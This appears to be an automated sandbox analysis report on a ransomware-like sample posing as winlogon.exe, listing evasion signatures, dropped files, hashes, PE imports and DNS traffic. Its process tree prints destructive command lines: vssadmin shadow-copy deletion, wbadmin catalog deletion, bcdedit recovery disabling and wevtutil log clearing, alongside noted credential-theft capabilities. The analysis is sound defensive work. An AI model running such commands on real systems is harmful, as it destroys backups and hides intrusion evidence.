Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle,4_2_001412E8
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeThread delayed: delay time: 3600000
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Users\user\Desktop\winlogon.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\_usm.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\winlogon.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-13588
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\winlogon.exe TID: 3392Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\yegus.exe TID: 3268Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\_usm.exe TID: 3300Thread sleep time: -3600000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wbengine.exe TID: 3492Thread sleep count: 89 > 30
Source: C:\Windows\System32\wbengine.exe TID: 3492Thread sleep time: -5340000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520Thread sleep count: 57 > 30
Source: C:\Windows\System32\vdsldr.exe TID: 3520Thread sleep time: -3420000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\vds.exe TID: 3548Thread sleep count: 81 > 30
Source: C:\Windows\System32\vds.exe TID: 3548Thread sleep time: -4860000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\vdsldr.exeLast function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Creates files inside the volume driver (system volume information)Show sources
Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup

Language, Device and Operating System Detection:

barindex
Contains functionality to create pipes for IPCShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D634B0 wsprintfW,CreateNamedPipeW,CreateEventW,CloseHandle,ConnectNamedPipe,GetLastError,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,GetOverlappedResult,CancelIo,CloseHandle,ReadFile,CloseHandle,1_2_00D634B0
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D74EF7 GetSystemTimeAsFileTime,1_2_00D74EF7
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100879B6 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_100879B6
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D65970 GetVersionExW,__Stoull,__Stoull,1_2_00D65970
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\winlogon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B6CE cpuid 1_2_00D6B6CE
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 46216 Sample: winlogon.exe Startdate: 12/02/2018 Architecture: WINDOWS Score: 100 56 252.0.0.224.in-addr.arpa 2->56 64 Antivirus detection for dropped file 2->64 66 Antivirus detection for submitted file 2->66 68 May disable shadow drive data (uses vssadmin) 2->68 72 3 other signatures 2->72 9 winlogon.exe 8 2->9         started        14 wbengine.exe 2 2->14         started        16 vdsldr.exe 2->16         started        18 3 other processes 2->18 signatures3 70 Tries to resolve many domain names, but no domain seems valid 56->70 process4 dnsIp5 58 8.8.8.8, 49408, 50225, 51075 GOOGLE-GoogleIncUS United States 9->58 60 192.168.2.238, 135 unknown unknown 9->60 62 8 other IPs or domains 9->62 48 C:\Users\HERBBL~1\AppData\Local\...\_usm.exe, PE32 9->48 dropped 50 C:\Users\HERBBL~1\AppData\Local\...\yegus.exe, PE32 9->50 dropped 52 C:\Users\HERBBL~1\AppData\Local\...\ucngw.exe, PE32 9->52 dropped 54 2 other files (none is malicious) 9->54 dropped 88 Contains functionality to inject threads in other processes 9->88 90 Contains functionality to inject code into remote processes 9->90 20 _usm.exe 9->20         started        22 yegus.exe 11 9->22         started        25 ucngw.exe 9->25         started        92 Creates files inside the volume driver (system volume information) 14->92 file6 94 Tries to resolve many domain names, but no domain seems valid 58->94 signatures7 process8 signatures9 27 cmd.exe 20->27         started        30 cmd.exe 20->30         started        32 cmd.exe 20->32         started        34 2 other processes 20->34 74 Contains functionality to steal Internet Explorer form passwords 22->74 76 Contains functionality to steal Chrome passwords 22->76 78 Tries to harvest and steal browser information (history, passwords, etc) 22->78 80 Contains functionality to dump credential hashes (LSA Dump) 25->80 process10 signatures11 82 May disable shadow drive data (uses vssadmin) 27->82 84 Deletes shadow drive data (may be related to ransomware) 27->84 36 vssadmin.exe 27->36         started        86 Uses bcdedit to modify the Windows boot settings 30->86 38 bcdedit.exe 1 30->38         started        40 bcdedit.exe 30->40         started        42 wbadmin.exe 2 32->42         started        44 wevtutil.exe 34->44         started        46 wevtutil.exe 34->46         started        process12

Simulations

Behavior and APIs

No simulations

Antivirus Detection

Initial Sample

SourceDetectionCloudLink
winlogon.exe62%virustotalBrowse

Dropped Files

SourceDetectionCloudLink
C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe60%virustotalBrowse
C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe0%virustotalBrowse
C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe3%metadefenderBrowse

Domains

SourceDetectionCloudLink
252.0.0.224.in-addr.arpa0%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot

windows-stand

Startup

  • System is w7
  • winlogon.exe (PID: 3216 cmdline: 'C:\Users\user\Desktop\winlogon.exe' MD5: CFDD16225E67471F5EF54CAB9B3A5558)
    • yegus.exe (PID: 3232 cmdline: 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464 MD5: 4F43F03783F9789F804DCF9B9474FA6D)
    • ucngw.exe (PID: 3280 cmdline: 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B MD5: 6E0EBEEEA1CB00192B074B288A4F9CFE)
    • _usm.exe (PID: 3296 cmdline: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe MD5: 3C0D740347B0362331C882C2DEE96DBF)
      • cmd.exe (PID: 3336 cmdline: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet MD5: AD7B9C14083B52BC532FBA5948342B98)
        • vssadmin.exe (PID: 3372 cmdline: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet MD5: 6E248A3D528EDE43994457CF417BD665)
      • cmd.exe (PID: 3404 cmdline: C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wbadmin.exe (PID: 3428 cmdline: wbadmin.exe delete catalog -quiet MD5: EAB630E7E6A7FC248870A2FCDC098B98)
      • cmd.exe (PID: 3668 cmdline: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no MD5: AD7B9C14083B52BC532FBA5948342B98)
        • bcdedit.exe (PID: 3692 cmdline: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures MD5: ABD373E82F6240031C1E631AA20711C7)
        • bcdedit.exe (PID: 3700 cmdline: bcdedit /set {default} recoveryenabled no MD5: ABD373E82F6240031C1E631AA20711C7)
      • cmd.exe (PID: 3708 cmdline: C:\Windows\system32\cmd.exe /c wevtutil.exe cl System MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 3732 cmdline: wevtutil.exe cl System MD5: 81538B795F922B8DA6FD897EFB04B5EE)
      • cmd.exe (PID: 3748 cmdline: C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 3772 cmdline: wevtutil.exe cl Security MD5: 81538B795F922B8DA6FD897EFB04B5EE)
  • wbengine.exe (PID: 3464 cmdline: C:\Windows\system32\wbengine.exe MD5: 691E3285E53DCA558E1A84667F13E15A)
  • vdsldr.exe (PID: 3496 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: A2551668C78CEA4089D71A0A3B36FC0C)
  • vds.exe (PID: 3524 cmdline: C:\Windows\System32\vds.exe MD5: C3CD30495687C2A2F66A65CA6FD89BE9)
  • LogonUI.exe (PID: 3840 cmdline: 'LogonUI.exe' /flags:0x0 MD5: 3EF0D8AB08385AAB5802E773511A2E6A)
  • LogonUI.exe (PID: 3928 cmdline: unknown MD5: 3EF0D8AB08385AAB5802E773511A2E6A)
  • cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):36864
Entropy (8bit):5.891300526858096
Encrypted:false
MD5:3C0D740347B0362331C882C2DEE96DBF
SHA1:8350E06F52E5C660BB416B03EDB6A5DDC50C3A59
SHA-256:AE9A4E244A9B3C77D489DEE8AEAF35A7C3BA31B210E76D81EF2E91790F052C85
SHA-512:A701F94B9CDEBCE6EFF2F82552EC7554BF10D99019F8BCD6871EBCA804D7519BDCFA3806AC7C7D8E604C3259C61C58B905293FA641C092A8FCA8245F91EB0F8F
Malicious:true
Antivirus:
  • Antivirus: virustotal, Detection: 60%, Browse
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):339096
Entropy (8bit):6.384232735880303
Encrypted:false
MD5:27304B246C7D5B4E149124D5F93C5B01
SHA1:E50D9E3BD91908E13A26B3E23EDEAF577FB3A095
SHA-256:3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF
SHA-512:BEC172A2F92A95796199CFC83F544A78685B52A94061CE0FFB46B265070EE0BCC018C4F548F56018BF3FF1E74952811B2AFB6DF79AB8D09F1EC73C9477AF636B
Malicious:false
Antivirus:
  • Antivirus: virustotal, Detection: 0%, Browse
  • Antivirus: metadefender, Detection: 3%, Browse
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):3723264
Entropy (8bit):7.9213131085726545
Encrypted:false
MD5:56E50AD3D0746E4A4B1458506DACF2E7
SHA1:0B818B27FD4C1656F43B288C29C510F0BABF939A
SHA-256:131BA113ED14E999275B0CC7C932277EF7CA944888F928EE8DB50333420CA3BC
SHA-512:69FE8FC3039C5503D15C8AE77E9B4D4DFA457D2DBF52289B6A5FBB83278713EA3AF63246F64E74B021BE6A7C67E2089702FC97F3EFD4C349CFEB5C44CA57BC04
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe:Zone.Identifier
File Type:ASCII text, with CRLF line terminators
Size (bytes):26
Entropy (8bit):3.9500637564362093
Encrypted:false
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Reputation:high, very likely benign file
C:\Users\HERBBL~1\AppData\Local\Temp\chr9AAC.tmp
File Type:SQLite 3.x database
Size (bytes):18432
Entropy (8bit):0.8481809040173017
Encrypted:false
MD5:727EB3BA54F16CB4C7C19AB1101B8802
SHA1:8702933960447F3FB8423E9F9F8FEF2C23D6B7AB
SHA-256:255F5314D835CBDC33B46216B083C3FA4DD7F61B27F48B539B41341EF0911423
SHA-512:FB079623312587E70AE2263FFCC9C12C492332CE6D048A85DD1B32C15535A6CF8E9D67AE146D01862B1C50B297EED0A07042AC19A4FC8838E534BCFEBFC77BE2
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):231424
Entropy (8bit):7.52549984722154
Encrypted:false
MD5:6E0EBEEEA1CB00192B074B288A4F9CFE
SHA1:21CA710ED3BC536BD5394F0BFF6D6140809156CF
SHA-256:A52AF66A4438C5517870C503AC1E0515AF44D3994AA62C7D818B6EEF46CFBB2D
SHA-512:BBB24AAC7EF5B5E8CF8934666D02C1E51980DB3C4703FEC1F240BAE35E1C8517E19736D8F2E27A9ED77D8A6881C2C3A5A3653E66425E7058B2985063FC38949C
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):769536
Entropy (8bit):7.930796192224973
Encrypted:false
MD5:4F43F03783F9789F804DCF9B9474FA6D
SHA1:492D4A4A74099074E26B5DFFD0D15434009CCFD9
SHA-256:19AB44A1343DB19741B0E0B06BACCE55990B6C8F789815DAAF3476E0CC30EBEA
SHA-512:645C2F0A1342732B86A45403FB8B1343BCC18C015C9918D2EDF118BBB210FEAD98AA21F1B66AC5FAABD0542583D74E158FBAC6D5F0D49827F4EEB58C8EBAFD6D
Malicious:false
Reputation:low
\122B85FE-84BD-45AB-AEE5-28D37FB4C464
File Type:data
Size (bytes):12
Entropy (8bit):2.125814583693911
Encrypted:false
MD5:177C7293D42D1C9C48678AB79D034F1E
SHA1:C828BAEF11CC61FC91D29D00AB980FBBA9A3BD42
SHA-256:7E1246792C8DFE9E1F254115344159F0A800EBD273F678E7036F10FCAC0CD377
SHA-512:DF3A4FCBDB220FDD26301A5B4DF68A15CB6DE5D748C86E1E340268D3F7C0384323E7A792DFBE8BADB1523339994CFFFEE1E94D7C64557DD47546C466B559D557
Malicious:false
\33F83B68-FC3D-4C1F-B4AE-1329770D367B
File Type:empty
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
252.0.0.224.in-addr.arpaunknownunknowntrue0%, virustotal, Browse

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
192.168.2.238unknown
unknownunknownfalse
192.168.2.240unknown
unknownunknownfalse
192.168.2.250unknown
unknownunknownfalse
192.168.2.252unknown
unknownunknownfalse
192.168.2.244unknown
unknownunknownfalse
8.8.8.8United States
15169GOOGLE-GoogleIncUSfalse
192.168.2.254unknown
unknownunknownfalse
192.168.2.242unknown
unknownunknownfalse
192.168.2.248unknown
unknownunknownfalse
192.168.2.246unknown
unknownunknownfalse

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.9213131085726545
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:winlogon.exe
File size:1861632
MD5:cfdd16225e67471f5ef54cab9b3a5558
SHA1:26de43cc558a4e0e60eddd4dc9321bcb5a0a181c
SHA256:edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9
SHA512:e1855a872f4db7c17eb22130d9cb205eddde641f1b39ea5de97dfb762fc97dc2347bc6e6e88b9c5a303e1540b4b4bdb19c839c7d3e237348adbfa4b942f24adb
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;E..hE..hE..h.._hO..h..]h...h..\h]..h.6ihD..h~..iQ..h~..ii..h~..iV..hL.-hF..hL.=hP..hE..h...h...iV..h..QhD..hE.9hD..h...iD..

File Icon

Static PE Info

General

Entrypoint:0x40ae66
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5A4387AF [Wed Dec 27 11:44:47 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:975087e9286238a80895b195efb3968d

Entrypoint Preview

Instruction
call 00007FC5206B76CFh
jmp 00007FC5206B70D3h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041F188h]
push dword ptr [ebp+08h]
call dword ptr [0041F184h]
push C0000409h
call dword ptr [0041F124h]
push eax
call dword ptr [0041F114h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007FC5206C98A3h
test eax, eax
je 00007FC5206B7247h
push 00000002h
pop ecx
int 29h
mov dword ptr [00430CC8h], eax
mov dword ptr [00430CC4h], ecx
mov dword ptr [00430CC0h], edx
mov dword ptr [00430CBCh], ebx
mov dword ptr [00430CB8h], esi
mov dword ptr [00430CB4h], edi
mov word ptr [00430CE0h], ss
mov word ptr [00430CD4h], cs
mov word ptr [00430CB0h], ds
mov word ptr [00430CACh], es
mov word ptr [00430CA8h], fs
mov word ptr [00430CA4h], gs
pushfd
pop dword ptr [00430CD8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00430CCCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00430CD0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00430CDCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00430C18h], 00010001h

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x26df40xdc.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x195b88.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c90000x1644.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x25df00x38.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x25e280x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x278.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x1d4ac0x1d600False0.573720079787data6.65423641734IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x1f0000x8bac0x8c00False0.497879464286data5.462837397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x280000x96fc0x8c00False0.0412109375data0.885300140538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids0x320000x1340x200False0.3984375data2.38182890346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x330000x195b880x195c00False1.00009145872data7.99984549743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x1c90000x16440x1800False0.766927083333data6.4041746291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
BIN0x331700xbbe00dataEnglishUnited States
BIN0xeef700x38800dataEnglishUnited States
BIN0x1277700x45600dataEnglishUnited States
BIN0x16cd700x52c98dataEnglishUnited States
BIN0x1bfa080x9000dataEnglishUnited States
RT_MANIFEST0x1c8a080x17dXML 1.0 document textEnglishUnited States

Imports

DLLImport
KERNEL32.dllGetVersionExW, GetModuleHandleA, CreateEventW, MultiByteToWideChar, Sleep, GetTempPathA, CopyFileA, GetLastError, GetFileAttributesA, CreateFileA, SetEvent, TerminateThread, DeleteFileW, CloseHandle, LoadLibraryW, CreateThread, GetOverlappedResult, VirtualProtectEx, GetWindowsDirectoryW, GetProcAddress, VirtualAllocEx, LocalFree, GetFileSize, DeleteCriticalSection, ExitProcess, GetCurrentProcessId, CreateProcessW, GetModuleHandleW, CreateRemoteThread, CreateProcessA, CreateEventA, ConnectNamedPipe, GetComputerNameA, GetFileAttributesW, HeapFree, HeapAlloc, GetProcessHeap, GetTempPathW, GetTickCount, SizeofResource, LockResource, LoadResource, FindResourceW, FindFirstFileExW, CreateFileW, LocalAlloc, WaitForSingleObject, InitializeCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, CreateNamedPipeW, GetModuleFileNameW, TerminateProcess, InterlockedDecrement, WriteFile, ReadFile, GetCurrentProcess, GetCommandLineW, EnterCriticalSection, WriteProcessMemory, CancelIo, FindClose, DecodePointer, SetEndOfFile, HeapSize, WriteConsoleW, FlushFileBuffers, GetStringTypeW, SetStdHandle, ReadConsoleW, SetFilePointerEx, GetModuleFileNameA, FreeLibrary, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, LCMapStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, WideCharToMultiByte, EncodePointer, RaiseException, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStdHandle, GetModuleHandleExW, GetACP, HeapReAlloc, GetConsoleCP, GetConsoleMode, GetFileType, FindNextFileW
USER32.dllwsprintfW
ADVAPI32.dllCryptAcquireContextW, CryptReleaseContext, LookupPrivilegeValueW, AdjustTokenPrivileges, CryptGenRandom, LookupPrivilegeNameW, CopySid, IsValidSid, LogonUserA, OpenProcessToken, ConvertSidToStringSidW, GetLengthSid, LookupAccountSidW, GetTokenInformation
SHELL32.dllSHGetSpecialFolderPathW, CommandLineToArgvW
ole32.dllCoCreateGuid, CoTaskMemFree, CoSetProxyBlanket, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoUninitialize
OLEAUT32.dllSysFreeString, SysAllocString, SysStringLen, SafeArrayUnaccessData, SafeArrayAccessData, VariantClear, SafeArrayCreate
IPHLPAPI.DLLGetIpNetTable
WS2_32.dllFreeAddrInfoW, GetAddrInfoW, WSACleanup, WSAStartup, ntohl
credui.dllCredUIParseUserNameW
NETAPI32.dllNetApiBufferFree, NetGetDCName

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 12, 2018 21:38:30.860141993 CET5684253192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.880199909 CET5344053192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.880276918 CET53534408.8.8.8192.168.2.2
Feb 12, 2018 21:38:30.905082941 CET5107553192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.905164003 CET53510758.8.8.8192.168.2.2
Feb 12, 2018 21:38:30.927845955 CET6305353192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.927926064 CET53630538.8.8.8192.168.2.2
Feb 12, 2018 21:38:30.995573997 CET6549053192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.995654106 CET53654908.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.002337933 CET6531153192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.002427101 CET53653118.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.012367010 CET5919553192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.012440920 CET53591958.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.036601067 CET6503453192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.036674976 CET53650348.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.050959110 CET5635253192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.051029921 CET53563528.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.059361935 CET5149253192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.059423923 CET53514928.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.765642881 CET53568428.8.8.8192.168.2.2
Feb 12, 2018 21:38:32.179327011 CET6523653192.168.2.28.8.8.8
Feb 12, 2018 21:38:32.311522007 CET53652368.8.8.8192.168.2.2
Feb 12, 2018 21:38:32.616265059 CET5717853192.168.2.28.8.8.8
Feb 12, 2018 21:38:32.753743887 CET53571788.8.8.8192.168.2.2
Feb 12, 2018 21:38:33.061160088 CET4940853192.168.2.28.8.8.8
